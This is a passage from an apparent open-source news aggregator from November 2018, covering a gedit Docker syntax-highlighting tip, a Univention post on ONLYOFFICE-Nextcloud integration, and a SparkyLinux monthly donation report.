It is a pity that RHEL users won’t be there to enjoy it by default. But, then again, they never really were. KDE is collaborative, open, privacy aware and with a vast scope of interesting projects after 22 years we continue to push the boundaries of what is possible and fun.

Facebooktwittergoogle_pluslinkedinby feather

02 November, 2018 04:36PM

Diego Turcios: Getting Docker Syntax In Gedit

I have been working with docker in the last days, and encounter the syntax issue with gedit. Just pure plain text. So make a small search and found an easy way for fixing this. I found Jasper J.F. van den Bosch repository in GitHub and found the solution for this simple problem.
We need to download the docker.lang file, available here:

After that, you go to the folder you save the file and do the following command.
sudo mv docker.lang /usr/share/gtksourceview-3.0/language-specs/ 
If this doesn't work you can try the following:

sudo mv docker.lang  ~/.local/share/gtksourceview-3.0/language-specs/
And that's all!

Screenshot of gedit with no docker lang

Screenshot of gedit with docker lang

02 November, 2018 04:18PM by Diego Turcios (

hackergotchi for Univention Corporate Server

Univention Corporate Server

ONLYOFFICE & Nextcloud Now in UCS: How the Solutions Met Again

Today we share our story about how ONLYOFFICE and Nextcloud have formed a strong duo within corporate infrastructures, and how Univention helps it become even more technically accessible to users.

Combined on-premises solutions for in-house collaboration

What the industry needs, it gets! Popular free services, such as Google Drive, that combine sharing and editing have had a big value of help for students, freelancers and businesses for long. However, the corporate scale, when it comes to responsibility and development, strives for more security and integration. This gap gave birth to combos of on-premises solutions for in-house collaboration.

Back in 2017, we created an integration app for Nextcloud that lets you edit and collaborate right in the Nextcloud interface, transferring data between the editors and the cloud platform. OOXML-based editors (with DOCX, XLSX and PPTX in core) in such combination were destined to success, since the niche was only given options designed mainly for ODF files.

The unplugged nature of open source, in turn, sustained the app development largely. Today, ONLYOFFICE-Nextcloud combo is already used by a number of names in various spheres, such as WayRay, Promotion Santé Valais, Inblay and a raw of others.

Screenshot of ONLYOFFICE

How the integration of ONLYOFFICE-Nextcloud works

The three main components it takes are ONLYOFFICE Document Server to edit the documents, Nextcloud Server to manage and share them, and the integration app (connector) to transfer documents between the editor and the storage. Let us quickly explain the role of the latter in this system.

Data exchange

ONLYOFFICE and Nextcloud are written in different languages (Node JS/JS and PHP, accordingly) and consist of formats and methods that differ, technically making the apps completely alien to each other on the user server. Therefore the exchange of data is impossible unless it is converted and restructured to fit the formats of the counterpart. That’s why we needed the specific app serving as a bridge between the two.

Management & Configuration

Roughly, the integration app provides your system with:

  • Configuration unit (settings directory) to manage data transport between the instances of ONLYOFFICE and Nextcloud;
  • A specific page to accommodate the editors within the interface;
  • A set of interface elements to manipulate actions;
  • Handlers to support file saving, sharing and other operations.

Compatibility of ONLYOFFICE and Nextcloud

As both ONLYOFFICE and Nextcloud add features and changes in the new versions, we constantly modernize the app to let it recognize the new formats of data in both services.

Moreover, each time we build it to support not only the latest versions but all the previous generations as well. For example, when updating an app for Nextcloud 13, it was crucial that it still completely works with Nextcloud 12, 11, 10 and so on.

ONLYOFFICE-Nextcloud pre-configured within the UCS environment

In Univention Corporate Server, ONLYOFFICE-Nextcloud system functions in a similar way to how it does elsewhere, i.e. through an integration app. However, the pre-built environment makes installation, configuration and updates much less routine and more UX-optimized for the admins.

The installation process is to a large extent automatic as settings are pre-configured. When an update is the issue in question, the additional configuration data (scripts, addresses and domains) is automatically transferred from the old versions.

Further extension options with Univention App Center Apps

In addition, the other apps that work in UCS can positively improve and extend the experience of the ONLYOFFICE-Nextcloud combo. For example, you can further secure the data transfer between the services domain-wise with Let’s Encrypt that provides HTTPs for the server using automatically updated SSL/TLS certificates.

A sharing platform and collaborative office suite for UCS users: benefits & requirements

With ONLYOFFICE paired with Nextcloud in UCS, you get an elaborated combination of a sharing platform and a collaborative office suite that is secure, scalable and handles all popular document formats.

Largely automated, the platform requires minimum manual configuration which makes the online office an accessible element in organizations with limited tech personnel (e.g. schools).

To meet every demand, ONLYOFFICE offers two versions. First, the free open source version for small and medium teams for up to 20 sessions. Second, the business-tailored Integration Edition that is flexible in number of users and includes more professional functionality.

If you have any questions regarding ONLYOFFICE and Nextcloud integration, feel free to comment below, or contact us at

Download ONLYOFFICE with Nextcloud as a ready-to-use virtual image

Further information

Installation guide of the Nextcloud-ONLYOFFICE Univention App Appliance

Der Beitrag ONLYOFFICE & Nextcloud Now in UCS: How the Solutions Met Again erschien zuerst auf Univention.

02 November, 2018 01:12PM by Anna Srinivasan

November 01, 2018

hackergotchi for SparkyLinux


October 2018 donation report

We would like to thank all of you very much – you are great as always.

Your donations let us pay the monthly bills and, what is very important, the yearly bill for the virtual server.

Thank’s again for an another year with you.

Don’t forget to send a small tip in November too 🙂

Aneta & Paweł

Krzysztof M.
PLN 50
Wojciech H.
Emil N.
PLN 30
Martin S.
€ 15
Georg K.
€ 11,11
Paweł M.
PLN 25
Paweł M.
PLN 50
Remi C.
€ 20
Waldemar P.
PLN 50
Dritan P.
€ 15
Rafał W.
PLN 15
Andrzej M.
PLN 10
Adam J.
PLN 30
Ruedi L.
€ 10
Brian P.
€ 5
Alexander F.
€ 10
Gernot P.
$ 10
Merlyn M.
$ 5
Thomas F.
$ 5
Adrian B.
$ 1
Stanisław W.
PLN 20
Jacek G.
PLN 40
Michael L.
€ 3,59
Chance L.
€ 50
Francois K.
€ 25
Michael C.
€ 35
Thomas L.
€ 11
Piotr R.
PLN 50
Marek M.
Jork S.
€ 2,5
Jens G.
€ 100
Krzysztof S.
PLN 20
Przemysław P.
PLN 50
William S.
€ 50
Dirk O.
€ 15
Tomasz M.
PLN 10
PLN 456
€ 378,2
$ 21

01 November, 2018 08:18PM by pavroo